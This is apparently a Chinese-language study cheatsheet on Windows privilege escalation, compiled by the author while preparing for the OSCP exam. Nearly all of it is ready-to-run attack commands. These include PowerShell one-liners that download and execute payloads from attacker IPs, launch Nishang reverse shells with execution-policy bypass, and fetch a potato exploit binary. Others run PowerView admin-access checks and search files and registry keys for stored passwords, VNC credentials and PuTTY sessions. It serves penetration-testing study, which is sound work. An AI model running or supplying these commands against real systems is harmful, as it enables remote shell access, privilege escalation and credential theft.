windows提权基础(一)
windows提权基础(一)
最近在准备OSCP的考试,将平时用到的一些方法结合网上一些方法总结为cheatsheet,便于梳理思路,后续会持续推出一些总结和利用,主要面向和我一样的初级学习者,希望能够共同进步
1.powershell使用
下载文件(类似wget):
powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe')
下载powershell的modules并导入:
powershell -c 'IEX(New-Object Net.WebClient).DownloadString(“http://ip_address>/full_path/script_name.ps1”)'
用Nishang获取一个反向的Powershell:
powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19/Invoke-PowerShellTcp.ps1','C:\Users\Public\Invoke-PowersShellTcp.ps1')
powershell -exec bypass -c Import-Module .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443
直接下载并执行
powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(“http://192.168.56.104/Invoke-PowerShellTcp.ps1”);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443
2.其他提权姿势汇总
基本信息收集
hostname
whoami
echo %USERNAME%
net users
net users username>
net localgroups
net group /domain
netstat -ano
netsh firewall show state
wmic qfe get Caption,Description,HotFixID,InstalledOn
# 计划任务查询
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
PowerSploit:
Powerview.ps1-域控查询,并查看是否有其他主机的admin权限
powershell -exec bypass
import-module powerview.ps1
Find-LocalAdminAccess
寻找密码,配置文件
findstr /si password *.txt | *.xml | *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
findstr /spin "password" *.*
dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
查看注册表信息
# 搜索自动登录信息:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# 搜索VNC登录信息:
reg query "HKCU\Software\ORL\WinVNC3\Password"
# 搜索putty登录会话:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# 在HKLM搜索password:
reg query HKLM /f password /t REG_SZ /s | clip
# 在HKCU搜索password:
reg query HKCU /f password /t REG_SZ /s | clip